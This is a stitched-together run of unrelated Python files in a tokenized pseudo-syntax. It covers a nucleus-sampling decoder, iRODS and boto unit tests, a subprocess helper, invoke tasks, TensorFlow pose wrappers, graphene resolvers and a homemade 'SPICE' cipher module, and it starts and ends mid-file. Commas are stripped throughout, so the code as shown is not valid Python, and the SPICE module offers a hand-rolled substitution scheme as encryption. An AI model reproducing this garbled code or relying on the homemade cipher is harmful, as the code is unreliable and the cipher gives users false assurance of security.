tokens at the tail of distribution. These will be # removed from the nucleus. sorted_idx_to_remove=cumulative_probs<g>self.nucleus_size<line_sep># Shift the indices to the right to keep the first token outside nucleus. sorted_idx_to_remove[<ellipsis> 1:]=sorted_idx_to_remove[<ellipsis> :-1].clone()<line_sep>sorted_idx_to_remove[<ellipsis> 0]=0<line_sep># Set logits to large negative value to avoid sampling them. Iterate over # the batch of examples. <for_stmt>t range(current_logits.size()[0])<block_start>idx_to_remove=sorted_idx[t][sorted_idx_to_remove[t]]<line_sep>current_logits[t][idx_to_remove]=-1e12<line_sep># Set logits for last predicted token to a large negative value to # avoid repetition. 
current_logits[t][last_predictions[t]]=-1e12<block_end># Sample from the filtered distribution. # shape: (batch_size, num_classes) current_probs=F.softmax(current_logits dim=-1)<line_sep># shape: (batch_size, ) current_predictions=torch.multinomial(current_probs 1)<line_sep>current_predictions=current_predictions.view(batch_size)<line_sep># Set current predicted tokens to be end-of-sentence for instances where # last prediction was also end-of-sentence token. current_predictions[last_predictions<eq>self._eos_index]=self._eos_index<line_sep>predictions.append(current_predictions)<block_end># Remove start-of-sentence token from predictions, and collect them together. # shape: (batch_size, max_steps) .. or could be less than max_steps. all_predictions=torch.stack(predictions[1:]).permute(1 0)<line_sep># We don't return any logprobs of generated sequence with nucleus sampling, # unlike `AutoregressiveBeamSearch`. <return>all_predictions <none><block_end><block_end>
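A minimal usage sketch of the class above, with made-up values: ``step`` is any callable mapping the partial predictions of shape ``(batch_size, timestep + 1)`` to logits of shape ``(batch_size, vocab_size)``. The toy step below returns random logits, so the sampled output is meaningless; it only shows the calling convention.

import torch

vocab_size = 10   # assumed toy vocabulary size
eos_index = 2     # assumed end-of-sentence index

def toy_step(partial_predictions):
    # Stand-in for a real model forward pass; returns random logits per sequence.
    return torch.randn(partial_predictions.size(0), vocab_size)

sampler = AutoRegressiveNucleusSampling(eos_index=eos_index, max_steps=5, nucleus_size=0.9)
start = torch.zeros(4, dtype=torch.long)      # batch of 4 start tokens
predictions, _ = sampler.search(start, toy_step)
print(predictions.shape)                      # (4, <= 5)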
<import_from_future_stmt> print_function<import_stmt>sys<if_stmt>sys.version_info<ge>(2 7)<block_start><import_stmt>unittest<block_end><else_stmt><block_start><import_stmt>unittest2<as>unittest<block_end><import_from_stmt>.. lib<import_from_stmt>.. paths<import_from_stmt>.. test<import_from_stmt>.resource_suite ResourceBase<import_from_stmt>..configuration IrodsConfig<class_stmt>Test_Irule(ResourceBase unittest.TestCase)<block_start>plugin_name=IrodsConfig().default_rule_engine_plugin<line_sep>class_name='Test_Irule'<def_stmt>setUp self<block_start>super(Test_Irule self).setUp()<block_end><def_stmt>tearDown self<block_start>super(Test_Irule self).tearDown()<block_end>@unittest.skipIf(test.settings.TOPOLOGY_FROM_RESOURCE_SERVER<or>plugin_name<eq>'irods_rule_engine_plugin-python' 'Skip for topology testing from resource server: reads server log')@unittest.skipUnless(plugin_name<eq>'irods_rule_engine_plugin-irods_rule_language' 'tests cache update - only applicable for irods_rule_language REP')<def_stmt>test_irule_printHello_in_serverLog_4189 self<block_start>svr_log_path=paths.server_log_path()<line_sep>initial_log_size=lib.get_file_size_by_path(svr_log_path)<line_sep>_,_,rc=self.admin.run_icommand(['irule' 'printHello' 'hi' 'null'])<line_sep># With the above invalid parameter ("hi"), irule should return an error code to OS... self.assertNotEqual(rc 0)<line_sep># and shouldn't run the requested operation: i.e., writing to the log. lib.delayAssert(<lambda>:lib.log_message_occurrences_equals_count(msg='\nHello' count=0 start_index=initial_log_size))<block_end>@unittest.skipUnless(plugin_name<eq>'irods_rule_engine_plugin-irods_rule_language' 'tests cache update - only applicable for irods_rule_language REP')<def_stmt>test_irule_printVariables_on_stdout_4189 self<block_start>stdout,stderr,rc=self.admin.run_icommand(['irule' 'writeLine("stdout","[*a][*b]")' '*a=1%*b=2' 'ruleExecOut'])<line_sep>self.assertEqual(rc 0)<line_sep>self.assertIn("[1][2]" stdout)<line_sep>stdout,stderr,rc=self.admin.run_icommand(['irule' 'writeLine("stdout","[*a]")' '*a=1%badInput' 'ruleExecOut'])<line_sep>self.assertNotIn("[1]" stdout)<line_sep>self.assertIn("badInput format error" stderr)<line_sep>self.assertNotEqual(rc 0)<block_end><block_end>
<import_from_stmt>. streams<import_stmt>logging<import_stmt>subprocess<import_stmt>sys<import_stmt>time<line_sep>log=logging.getLogger("openproblems")<def_stmt>format_error_timeout process timeout stream<block_start>"""Format subprocess output on timeout."""<line_sep><return>"{}\nTimed out after {} s\n\n{}".format(" ".join(process.args) timeout streams.NonBlockingStreamReader(stream).read().decode("utf-8") )<block_end><def_stmt>_format_error process stream<block_start>"""Format subprocess output."""<line_sep><return>"{}\nReturn code {}\n\n{}".format(" ".join(process.args) process.returncode stream.decode("utf-8"))<block_end><def_stmt>format_error_stderr process<block_start>"""Format subprocess output from stderr."""<line_sep><return>_format_error(process process.stderr)<block_end><def_stmt>format_error_stdout process<block_start>"""Format subprocess output from stdout."""<line_sep><return>_format_error(process process.stdout)<block_end><def_stmt>git_file_age filename<block_start>"""Get the age of a file's last git commit."""<line_sep>git_age=(run(["git" "log" "-1" '--format="%ad"' "--date=unix" "--" filename] return_stdout=<true> ).strip().replace('"' ""))<if_stmt>git_age<eq>""<block_start><return>0<block_end><else_stmt><block_start><return>int(git_age)<block_end><block_end><def_stmt>_run_failed process error_raises format_error<block_start><raise>error_raises(format_error(process))<block_end><def_stmt>run command shell=<false> print_stdout=<false> return_stdout=<false> return_code=<false> error_raises=AssertionError format_error=<none> timeout=3600 <block_start>"""Run subprocess. Parameters ---------- command : list of str shell : bool Run command in a new shell print_stdout : bool Print subprocess stdout to sys.stdout return_stdout : bool Return subprocess stdout return_code : bool Return subprocess exit code error_raises : Exception Which exception to raise on failure format_error : callable Function to call to generate error message. If None, chooses from `format_error_stderr` and `format_error_stdout` automatically. 
"""<if_stmt>return_stdout<and>print_stdout<block_start><raise>NotImplementedError<block_end><elif_stmt>return_stdout<block_start>stderr=subprocess.PIPE<if_stmt>format_error<is><none><block_start>format_error=format_error_stderr<block_end><block_end><else_stmt><block_start>stderr=subprocess.STDOUT<if_stmt>format_error<is><none><block_start>format_error=format_error_stdout<block_end><block_end>log.debug("Running subprocess: {}".format(command))<line_sep>p=subprocess.Popen(command shell=shell stdout=subprocess.PIPE stderr=stderr)<if_stmt>timeout<is><not><none><block_start>runtime=0<if_stmt>p.poll()<is><none><block_start>time.sleep(1)<line_sep>runtime<augadd>1<block_end><if_stmt>runtime<g>timeout<block_start><raise>RuntimeError(format_error_timeout(p timeout p.stderr<if>stderr<is>subprocess.PIPE<else>p.stdout))<block_end><block_end>log.debug("Awaiting subprocess completion")<if_stmt>print_stdout<block_start><while_stmt><true><block_start>output=p.stdout.readline().decode("utf-8")<if_stmt>output<eq>""<and>p.poll()<is><not><none><block_start><break><block_end><if_stmt>output<block_start>print(output.strip())<line_sep>sys.stdout.flush()<block_end><block_end><block_end><else_stmt><block_start>p.wait()<block_end>log.debug("Subprocess complete")<line_sep>p.stdout,p.stderr=p.communicate()<line_sep>output=[]<if_stmt>return_stdout<block_start>output.append(p.stdout.decode("utf-8"))<block_end><if_stmt>return_code<block_start>output.append(p.returncode)<block_end><if_stmt><not>return_code<and><not>p.returncode<eq>0<block_start>_run_failed(p error_raises format_error)<block_end><if_stmt>output<block_start><return>output[0]<if>len(output)<eq>1<else>tuple(output)<block_end><block_end>
<import_from_stmt>invoke run<import_from_stmt>invoke task<line_sep>@task<def_stmt>clean all=<false><block_start><if_stmt>all<block_start>flag="--all"<block_end><else_stmt><block_start>flag=""<block_end>run("python setup.py clean {}".format(flag))<block_end>@task<def_stmt>build docs=<false><block_start>run("python setup.py build")<if_stmt>docs<block_start>run("sphinx-build docs docs/_build")<block_end><block_end>@task<def_stmt>test <block_start>run("python setup.py test")<block_end>@task<def_stmt>lint <block_start>run("rst2html.py README.rst > /dev/null")<line_sep>run("flake8 registration")<line_sep>run("isort --recursive --check-only registration")<block_end>
<import_stmt>os<import_stmt>json<import_from_stmt>collections OrderedDict<import_stmt>numpy<as>np<import_stmt>tensorflow<as>tf<line_sep>cur_path=os.path.realpath(__file__)<line_sep>ROOT_PATH=os.path.dirname(cur_path)<line_sep># add any new ops under the following pose_to_heatmap_fn=tf.load_op_library(os.path.join(ROOT_PATH 'pose_to_heatmap.so')).pose_to_heatmap<line_sep>zero_out_channels_fn=tf.load_op_library(os.path.join(ROOT_PATH 'zero_out_channels.so')).zero_out_channels<line_sep>render_pose_fn=tf.load_op_library(os.path.join(ROOT_PATH 'render_pose.so')).render_pose<line_sep>render_objects_fn=tf.load_op_library(os.path.join(ROOT_PATH 'render_objects.so')).render_objects<def_stmt>pose_to_heatmap *args **kwargs<block_start><with_stmt>tf.variable_scope('pose_to_heatmap_pyWrapper')<block_start>pose_img,pose_valid=pose_to_heatmap_fn(*args **kwargs)<line_sep>out_channels=kwargs['out_channels']<line_sep>pose_img.set_shape((<none> <none> out_channels))<line_sep>pose_valid.set_shape((out_channels ))<line_sep>pose_img<augmul>255.0<line_sep>pose_img=tf.cast(pose_img tf.uint8)<block_end><return>pose_img pose_valid<block_end><def_stmt>zero_out_channels *args **kwargs<block_start><with_stmt>tf.variable_scope('zero_out_channels_pyWrapper')<block_start><return>zero_out_channels_fn(*args **kwargs)<block_end><block_end><def_stmt>render_pose *args **kwargs<block_start><with_stmt>tf.variable_scope('render_pose_pyWrapper')<block_start>out_channels=3<if_stmt>kwargs['out_type']<eq>'rgb'<block_start>kwargs['out_type']=1<line_sep>out_channels=3<block_end><elif_stmt>kwargs['out_type']<eq>'split-channel'<block_start>kwargs['out_type']=2<line_sep>out_channels=18# number of limbs <block_end>img=render_pose_fn(*args **kwargs)<line_sep>img<augmul>255.0<line_sep>img=tf.cast(img tf.uint8)<line_sep>img.set_shape((<none> <none> out_channels))<block_end><return>img<block_end># from render_pose.cc mpii_to_coco=OrderedDict([(9 0) (8 1) (12 2) (11 3) (10 4) (13 5) (14 6) (15 7) (2 8) (1 9) (0 10) (3 11) (4 12) (5 13) ])<def_stmt>read_json_pose_fn fpath<block_start><try_stmt><block_start><with_stmt>open(fpath 'r')<as>fin<block_start>data=json.load(fin)<block_end><block_end><except_stmt><block_start>print('Unable to open file {}'.format(fpath))<line_sep><return>-np.ones((16<times>3 )).astype('int64')<block_end>res=[]<for_stmt>body data['bodies']<block_start>mpii_joints=-np.ones((16 3))<line_sep>joints=np.array(body['joints'])<line_sep>joints=np.reshape(joints (-1 3))<line_sep>joints[joints[<ellipsis> :]<le>0]=-1<line_sep>mpii_joints[np.array(mpii_to_coco.keys()) :]=joints[np.array(mpii_to_coco.values()) :]<line_sep>res<augadd>mpii_joints.reshape((-1 )).tolist()<block_end>res=np.array(res).astype('int64')<line_sep><return>res<block_end><def_stmt>read_json_pose *args<block_start><return>tf.py_func(read_json_pose_fn args tf.int64)<block_end><def_stmt>render_objects *args **kwargs<block_start><with_stmt>tf.variable_scope('render_objects_pyWrapper')<block_start>img=render_objects_fn(*args **kwargs)<line_sep>img<augmul>255.0<line_sep>img=tf.cast(img tf.uint8)<line_sep>img.set_shape((<none> <none> kwargs['out_channels']))<block_end><return>img<block_end><def_stmt>extract_glimpse image pose_label orig_im_ht orig_im_wd out_side pad_ratio parts_keep# pose label is a [3x16xn,] vector # for now just take the first pose and crop out the human <block_start><with_stmt>tf.name_scope('ExtractGlimpse')<block_start>pose_label=pose_label[:16<times>3]<line_sep>pose_label=tf.reshape(pose_label [16 
3])<if_stmt>len(parts_keep)<g>0<block_start>pose_label=tf.gather(pose_label parts_keep)<block_end><if_stmt>len(parts_keep)<eq>1# now only one point, but need at least two to make a crop region <block_start>delta=tf.to_int64([tf.to_float(tf.shape(image)[-2])<times>0.1 tf.to_float(tf.shape(image)[-3])<times>0.1 0])<line_sep>pose_label=tf.stack([pose_label[0]-delta pose_label[0]+delta])<block_end>pose_label_x=tf.to_float(pose_label[: 0])<times>tf.to_float(tf.shape(image)[-2])/tf.to_float(orig_im_wd)<line_sep>pose_label_y=tf.to_float(pose_label[: 1])<times>tf.to_float(tf.shape(image)[-3])/tf.to_float(orig_im_ht)<line_sep>pose_label=tf.stack([pose_label_y pose_label_x])<line_sep>mx_pts=tf.to_int32(tf.reduce_max(pose_label axis=1))<line_sep>mn_pts=tf.to_int32(tf.reduce_min(tf.where(tf.greater_equal(pose_label 0) pose_label tf.ones(pose_label.get_shape())<times>999999) axis=1))<line_sep>delta_0=tf.to_int32(tf.to_float((mx_pts[0]-mn_pts[0]))<times>pad_ratio)<line_sep>delta_1=tf.to_int32(tf.to_float((mx_pts[1]-mn_pts[1]))<times>pad_ratio)<line_sep>mx_pts=mx_pts+[delta_0 delta_1]<line_sep>mn_pts=mn_pts-[delta_0 delta_1]<line_sep>offset_ht=tf.maximum(mn_pts[0] 0)<line_sep>offset_wd=tf.maximum(mn_pts[1] 0)<line_sep>target_ht=tf.minimum(mx_pts[0]-offset_ht tf.shape(image)[-3]-offset_ht-1)<line_sep>target_wd=tf.minimum(mx_pts[1]-offset_wd tf.shape(image)[-2]-offset_wd-1)<line_sep># image = tf.Print(image, [offset_ht, offset_wd, target_ht, target_wd, # tf.shape(image)], "stuff:") image=tf.cond(tf.logical_and(tf.greater(mx_pts[1] mn_pts[1]) tf.greater(mx_pts[0] mn_pts[0])) <lambda>:tf.image.crop_to_bounding_box(image offset_ht offset_wd target_ht target_wd) <lambda>:image)<if_stmt>out_side<g>0<block_start>image=tf.image.resize_images(image [out_side out_side])<block_end><return>image<block_end><block_end><def_stmt>read_sparse_label_fn sparse_label nclasses<block_start>"""sparse_label is a string and return a 1D vector with the dense label """<line_sep>res=np.zeros((nclasses ) dtype='int32')<line_sep>res[np.array([int(el.split(':')[0])<for>el sparse_label.split(',')])]=np.array([int(el.split(':')[1])<for>el sparse_label.split(',')])<line_sep>res[res<l>0]=0# get rid of -1 label for now <return>res<block_end><def_stmt>read_sparse_label *args<block_start><return>tf.py_func(read_sparse_label_fn args tf.int32)<block_end>
<import_from_stmt>graphene.utils.get_unbound_function get_unbound_function<def_stmt>get_custom_resolver obj_type orm_field_name<block_start>""" Since `graphene` will call `resolve_<field_name>` on a field only if it does not have a `resolver`, we need to re-implement that logic here so users are able to override the default resolvers that we provide. """<line_sep>resolver=getattr(obj_type 'resolve_{}'.format(orm_field_name) <none>)<if_stmt>resolver<block_start><return>get_unbound_function(resolver)<block_end><return><none><block_end><def_stmt>get_attr_resolver obj_type model_attr<block_start>""" In order to support field renaming via `ORMField.model_attr`, we need to define resolver functions for each field. :param SQLAlchemyObjectType obj_type: :param str model_attr: the name of the SQLAlchemy attribute :rtype: Callable """<line_sep><return><lambda>root _info:getattr(root model_attr <none>)<block_end>
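A quick hypothetical illustration of ``get_attr_resolver``: the returned callable simply reads ``model_attr`` off the root object, and the object type argument is unused by it, so ``None`` is passed here.

class FakeRow:
    full_name = "Ada Lovelace"

resolve_name = get_attr_resolver(obj_type=None, model_attr="full_name")
assert resolve_name(FakeRow(), None) == "Ada Lovelace"
# A missing attribute falls back to None rather than raising.
assert resolve_name(object(), None) is None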
<import_stmt>unittest<import_stmt>headercvt_test_utils<as>util<class_stmt>TestHeadercvtFuncDecl(unittest.TestCase)<block_start><def_stmt>setUp self<block_start>util.check_existence_of_headercvt()<block_end>@util.with_temp_wd<def_stmt>test_headercvt_funcdecl_accept_case self wd<block_start>util.kick_headercvt_and_get_results(wd """ void clSomeFunction(int, void *); """)<line_sep>self.assertTrue(util.compile_with(wd "clSomeFunction(10, <void*>0)"))<block_end>@util.with_temp_wd<def_stmt>test_headercvt_funcdecl_decline_case self wd<block_start>results=util.kick_headercvt_and_get_results(wd """ void SomeFunction(int, void *); """)<line_sep>self.assertTrue(<not>util.contains(results["func_decl"] "SomeFunction"))<line_sep>self.assertTrue(util.compile_with(wd ""))<block_end><block_end>
<import_from_stmt>tests.compat unittest<import_from_stmt>boto.ec2.connection EC2Connection<import_from_stmt>boto.ec2.blockdevicemapping BlockDeviceType BlockDeviceMapping<import_from_stmt>tests.compat OrderedDict<import_from_stmt>tests.unit AWSMockServiceTestCase<class_stmt>BlockDeviceTypeTests(unittest.TestCase)<block_start><def_stmt>setUp self<block_start>self.block_device_type=BlockDeviceType()<block_end><def_stmt>check_that_attribute_has_been_set self name value attribute<block_start>self.block_device_type.endElement(name value <none>)<line_sep>self.assertEqual(getattr(self.block_device_type attribute) value)<block_end><def_stmt>test_endElement_sets_correct_attributes_with_values self<block_start><for_stmt>arguments [("volumeId" 1 "volume_id") ("virtualName" "some name" "ephemeral_name") ("snapshotId" 1 "snapshot_id") ("volumeSize" 1 "size") ("status" "some status" "status") ("attachTime" 1 "attach_time") ("somethingRandom" "somethingRandom" "somethingRandom")]<block_start>self.check_that_attribute_has_been_set(arguments[0] arguments[1] arguments[2])<block_end><block_end><def_stmt>test_endElement_with_name_NoDevice_value_true self<block_start>self.block_device_type.endElement("NoDevice" 'true' <none>)<line_sep>self.assertEqual(self.block_device_type.no_device <true>)<block_end><def_stmt>test_endElement_with_name_NoDevice_value_other self<block_start>self.block_device_type.endElement("NoDevice" 'something else' <none>)<line_sep>self.assertEqual(self.block_device_type.no_device <false>)<block_end><def_stmt>test_endElement_with_name_deleteOnTermination_value_true self<block_start>self.block_device_type.endElement("deleteOnTermination" "true" <none>)<line_sep>self.assertEqual(self.block_device_type.delete_on_termination <true>)<block_end><def_stmt>test_endElement_with_name_deleteOnTermination_value_other self<block_start>self.block_device_type.endElement("deleteOnTermination" 'something else' <none>)<line_sep>self.assertEqual(self.block_device_type.delete_on_termination <false>)<block_end><def_stmt>test_endElement_with_name_encrypted_value_true self<block_start>self.block_device_type.endElement("Encrypted" "true" <none>)<line_sep>self.assertEqual(self.block_device_type.encrypted <true>)<block_end><def_stmt>test_endElement_with_name_Encrypted_value_other self<block_start>self.block_device_type.endElement("Encrypted" 'something else' <none>)<line_sep>self.assertEqual(self.block_device_type.encrypted <false>)<block_end><block_end><class_stmt>BlockDeviceMappingTests(unittest.TestCase)<block_start><def_stmt>setUp self<block_start>self.block_device_mapping=BlockDeviceMapping()<block_end><def_stmt>block_device_type_eq self b1 b2<block_start><if_stmt>isinstance(b1 BlockDeviceType)<and>isinstance(b2 BlockDeviceType)<block_start><return>all([b1.connection<eq>b2.connection b1.ephemeral_name<eq>b2.ephemeral_name b1.no_device<eq>b2.no_device b1.volume_id<eq>b2.volume_id b1.snapshot_id<eq>b2.snapshot_id b1.status<eq>b2.status b1.attach_time<eq>b2.attach_time b1.delete_on_termination<eq>b2.delete_on_termination b1.size<eq>b2.size b1.encrypted<eq>b2.encrypted])<block_end><block_end><def_stmt>test_startElement_with_name_ebs_sets_and_returns_current_value self<block_start>retval=self.block_device_mapping.startElement("ebs" <none> <none>)<assert_stmt>self.block_device_type_eq(retval BlockDeviceType(self.block_device_mapping))<block_end><def_stmt>test_startElement_with_name_virtualName_sets_and_returns_current_value self<block_start>retval=self.block_device_mapping.startElement("virtualName" <none> 
<none>)<assert_stmt>self.block_device_type_eq(retval BlockDeviceType(self.block_device_mapping))<block_end><def_stmt>test_endElement_with_name_device_sets_current_name_dev_null self<block_start>self.block_device_mapping.endElement("device" "/dev/null" <none>)<line_sep>self.assertEqual(self.block_device_mapping.current_name "/dev/null")<block_end><def_stmt>test_endElement_with_name_device_sets_current_name self<block_start>self.block_device_mapping.endElement("deviceName" "some device name" <none>)<line_sep>self.assertEqual(self.block_device_mapping.current_name "some device name")<block_end><def_stmt>test_endElement_with_name_item_sets_current_name_key_to_current_value self<block_start>self.block_device_mapping.current_name="some name"<line_sep>self.block_device_mapping.current_value="some value"<line_sep>self.block_device_mapping.endElement("item" "some item" <none>)<line_sep>self.assertEqual(self.block_device_mapping["some name"] "some value")<block_end><block_end><class_stmt>TestLaunchConfiguration(AWSMockServiceTestCase)<block_start>connection_class=EC2Connection<def_stmt>default_body self# This is a dummy response <block_start><return>b""" <DescribeLaunchConfigurationsResponse> </DescribeLaunchConfigurationsResponse> """<block_end><def_stmt>test_run_instances_block_device_mapping self# Same as the test in ``unit/ec2/autoscale/test_group.py:TestLaunchConfiguration``, # but with modified request parameters (due to a mismatch between EC2 & # Autoscaling). <block_start>self.set_http_response(status_code=200)<line_sep>dev_sdf=BlockDeviceType(snapshot_id='snap-12345')<line_sep>dev_sdg=BlockDeviceType(snapshot_id='snap-12346' delete_on_termination=<true> encrypted=<true>)<class_stmt>OrderedBlockDeviceMapping(OrderedDict BlockDeviceMapping)<block_start><pass><block_end>bdm=OrderedBlockDeviceMapping()<line_sep>bdm.update(OrderedDict((('/dev/sdf' dev_sdf) ('/dev/sdg' dev_sdg))))<line_sep>response=self.service_connection.run_instances(image_id='123456' instance_type='m1.large' security_groups=['group1' 'group2'] block_device_map=bdm)<line_sep>self.assert_request_parameters({'Action':'RunInstances' 'BlockDeviceMapping.1.DeviceName':'/dev/sdf' 'BlockDeviceMapping.1.Ebs.DeleteOnTermination':'false' 'BlockDeviceMapping.1.Ebs.SnapshotId':'snap-12345' 'BlockDeviceMapping.2.DeviceName':'/dev/sdg' 'BlockDeviceMapping.2.Ebs.DeleteOnTermination':'true' 'BlockDeviceMapping.2.Ebs.SnapshotId':'snap-12346' 'BlockDeviceMapping.2.Ebs.Encrypted':'true' 'ImageId':'123456' 'InstanceType':'m1.large' 'MaxCount':1 'MinCount':1 'SecurityGroup.1':'group1' 'SecurityGroup.2':'group2' } ignore_params_values=['Version' 'AWSAccessKeyId' 'SignatureMethod' 'SignatureVersion' 'Timestamp'])<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>unittest.main()<block_end>
'''Module that implements SPICE. This module provides access to a standardized implementation of SPICE (Stephen's Power-Inspired, Computerized Encryption).'''<line_sep>################################################################################ __version__='$Revision: 0 $'<line_sep>__date__='April 19, 2008'<line_sep>__author__='Stephen "Zero" Chappell <<EMAIL>>'<line_sep>__credits__='''\ <NAME>, for testing code that led to this module. <NAME>, for contributing to the random module. <NAME>, for adding support for two core generators.'''<line_sep>################################################################################ <import_stmt>random<as>_random<import_stmt>sys<as>_sys<line_sep>################################################################################ <def_stmt>crypt_major <block_start>'Create a new Major Key.'<line_sep><return>''.join(map(chr _crypt.sample(xrange(256) 256)))<block_end><def_stmt>crypt_minor <block_start>'Create a new Minor Key.'<line_sep>sample=_crypt.sample(range(4)<times>64 256)<line_sep>array=[]<for_stmt>index xrange(64)<block_start>bits_12=sample[index<times>4]<lshift>6<line_sep>bits_34=sample[index<times>4+1]<lshift>4<line_sep>bits_56=sample[index<times>4+2]<lshift>2<line_sep>bits_78=sample[index<times>4+3]<line_sep>array.append(bits_12+bits_34+bits_56+bits_78)<block_end><return>''.join(map(chr array))<block_end>################################################################################ <def_stmt>named_major name<block_start>'Create a named Major Key.'<line_sep>_namer.seed(name)<line_sep><return>''.join(map(chr _namer.sample(xrange(256) 256)))<block_end><def_stmt>named_minor name<block_start>'Create a named Minor Key.'<line_sep>_namer.seed(name)<line_sep>sample=_namer.sample(range(4)<times>64 256)<line_sep>array=[]<for_stmt>index xrange(64)<block_start>bits_12=sample[index<times>4]<lshift>6<line_sep>bits_34=sample[index<times>4+1]<lshift>4<line_sep>bits_56=sample[index<times>4+2]<lshift>2<line_sep>bits_78=sample[index<times>4+3]<line_sep>array.append(bits_12+bits_34+bits_56+bits_78)<block_end><return>''.join(map(chr array))<block_end>################################################################################ <def_stmt>encode_string string major minor<block_start>'Return an encrypted string.'<assert_stmt>isinstance(string str)<line_sep>_check_major(major)<line_sep>_check_minor(minor)<line_sep>map_1=_encode_map_1(major)<line_sep>map_2=_encode_map_2(minor)<line_sep><return>_encode(string map_1 map_2)<block_end><def_stmt>decode_string string major minor<block_start>'Return a decrypted string.'<assert_stmt>isinstance(string str)<and>len(string)%4<eq>0<line_sep>_check_major(major)<line_sep>_check_minor(minor)<line_sep>map_1=_decode_map_1(minor)<line_sep>map_2=_decode_map_2(major)<line_sep><return>_decode(string map_1 map_2)<block_end>################################################################################ <def_stmt>encode_file source destination major minor<block_start>'Encrypt a file from source to destination.'<line_sep>_check_major(major)<line_sep>_check_minor(minor)<line_sep>map_1=_encode_map_1(major)<line_sep>map_2=_encode_map_2(minor)<line_sep>string=source.read(2<power>20/5)<while_stmt>string<block_start>destination.write(_encode(string map_1 map_2))<line_sep>string=source.read(2<power>20/5)<block_end><block_end><def_stmt>decode_file source destination major minor<block_start>'Decrypt a file from source to 
destination.'<line_sep>_check_major(major)<line_sep>_check_minor(minor)<line_sep>map_1=_decode_map_1(minor)<line_sep>map_2=_decode_map_2(major)<line_sep>string=source.read(2<power>20/5<times>4)<while_stmt>string<block_start>tail_len=len(string)%4<if_stmt>tail_len<eq>0<block_start>destination.write(_decode(string map_1 map_2))<line_sep>string=source.read(2<power>20/5<times>4)<block_end><else_stmt><block_start>destination.write(_decode(string[:-tail_len] map_1 map_2))<line_sep><return>string[-tail_len:]<block_end><block_end><return>''<block_end>################################################################################ <class_stmt>File_Crypt<block_start>'File_Crypt(major, minor, name, mode) -> File_Crypt'<def_stmt>__init__ self major minor name mode<block_start>'Initialize the File_Crypt object.'<line_sep>_check_major(major)<line_sep>_check_minor(minor)<line_sep>self.__em1=_encode_map_1(major)<line_sep>self.__em2=_encode_map_2(minor)<line_sep>self.__dm1=_decode_map_1(minor)<line_sep>self.__dm2=_decode_map_2(major)<assert_stmt>len(mode)<eq>1<and>mode<in>'raw'<line_sep>self.__file=open(name mode+'b' 0)<line_sep>self.tail=''<block_end><def_stmt>read self size=-1<block_start>'Read and decrypt from file.'<line_sep>string=self.__file.read(size<times>4)<line_sep>tail_len=len(string)%4<if_stmt>tail_len<block_start>self.tail=string[-tail_len:]<line_sep><return>_decode(string[:-tail_len] self.__dm1 self.__dm2)<block_end><else_stmt><block_start><return>_decode(string self.__dm1 self.__dm2)<block_end><block_end><def_stmt>write self string<block_start>'Encrypt and write to file.'<line_sep>self.__file.write(_encode(string self.__em1 self.__em2))<block_end><def_stmt>seek self offset whence=0<block_start>'Seek to virtual positon in file.'<line_sep>self.__file.seek(offset<times>4 whence)<line_sep>offset=self.__file.tell()/4<line_sep>self.__file.seek(offset<times>4)<block_end><def_stmt>tell self<block_start>'Return the virtual position in file.'<line_sep><return>self.__file.tell()/4<block_end><def_stmt>close self<block_start>'Close the File_Crypt object.'<line_sep>self.__file.close()<block_end><block_end>################################################################################ <class_stmt>Socket_Crypt<block_start>'Socket_Crypt(major, minor, socket) -> Socket_Crypt'<def_stmt>__init__ self major minor socket<block_start>'Initialize the Socket_Crypt object.'<line_sep>_check_major(major)<line_sep>_check_minor(minor)<line_sep>self.__em1=_encode_map_1(major)<line_sep>self.__em2=_encode_map_2(minor)<line_sep>self.__dm1=_decode_map_1(minor)<line_sep>self.__dm2=_decode_map_2(major)<line_sep>self.__major=major<line_sep>self.__minor=minor<line_sep>self.__socket=socket<line_sep>self.__tail=''<line_sep>self.__tails={}<block_end><def_stmt>accept self<block_start>'Return a new Socket_Crypt and address.'<line_sep>conn,address=self.__socket.accept()<line_sep><return>Socket_Crypt(self.__major self.__minor conn) address<block_end><def_stmt>recv self size flags=0<block_start>'Receive and decrypt off socket.'<line_sep>string=self.__tail+self.__socket.recv(size<times>4 flags)<line_sep>tail_len=len(string)%4<if_stmt>tail_len<block_start>self.__tail=string[-tail_len:]<line_sep><return>_decode(string[:-tail_len] self.__dm1 self.__dm2)<block_end><else_stmt><block_start>self.__tail=''<line_sep><return>_decode(string self.__dm1 self.__dm2)<block_end><block_end><def_stmt>recvfrom self size flags=0<block_start>'Receive datagram and decrypt off socket.'<line_sep>string,address=self.__socket.recvfrom(size<times>4 
flags)<line_sep>string=self.__tails.get(address '')+string<line_sep>tail_len=len(string)%4<if_stmt>tail_len<block_start>self.__tails[address]=string[-tail_len:]<line_sep>string=_decode(string[:-tail_len] self.__dm1 self.__dm2)<line_sep><return>string address<block_end><else_stmt><block_start><if_stmt>address<in>self.__tails<block_start><del_stmt>self.__tails[address]<block_end>string=_decode(string self.__dm1 self.__dm2)<line_sep><return>string address<block_end><block_end><def_stmt>send self string flags=0<block_start>'Encrypt and send on socket.'<line_sep>string=_encode(string self.__em1 self.__em2)<line_sep>sent=self.__socket.send(string flags)<line_sep>offset=sent%4<if_stmt>offset<block_start>string=string[sent:][:4-offset]<line_sep>sent<augadd>len(string)<while_stmt>string<block_start>string=string[self.__socket.send(string flags):]<block_end><block_end><return>sent/4<block_end><def_stmt>sendall self string flags=0<block_start>'Encrypt and send all on socket.'<line_sep>string=_encode(string self.__em1 self.__em2)<line_sep><return>self.__socket.sendall(string flags)<block_end><def_stmt>sendto self string address flags=0<block_start>'Encrypt and send datagram on socket.'<line_sep>string=_encode(string self.__em1 self.__em2)<line_sep>sent=self.__socket.sendto(string flags address)<line_sep>offset=sent%4<if_stmt>offset<block_start>string=string[sent:][:4-offset]<line_sep>sent<augadd>len(string)<while_stmt>string<block_start>string=string[self.socket.sentto(string flags address):]<block_end><block_end><return>sent/4<block_end><def_stmt>makefile self mode='r' bufsize=-1<block_start>'Return a file-like object.'<line_sep><return>self<block_end><def_stmt>read self size=-1<block_start>'Read and decrypt from socket.'<if_stmt>size<l>0<block_start>cache=''<while_stmt><true><block_start>temp=self.recv(2<power>10)<if_stmt>temp<block_start>cache<augadd>temp<block_end><else_stmt><block_start><return>cache<block_end><block_end><block_end><else_stmt><block_start><return>self.recv(size)<block_end><block_end><def_stmt>readline self size=-1<block_start>'Dummy attribute for cPickle.'<line_sep><raise>NotImplementedError<block_end><def_stmt>write self string<block_start>'Encrypt and write to socket.'<line_sep>self.sendall(string)<block_end><block_end>################################################################################ <class_stmt>String_Crypt<block_start>'String_Crypt(major, minor) -> String_Crypt'<def_stmt>__init__ self major 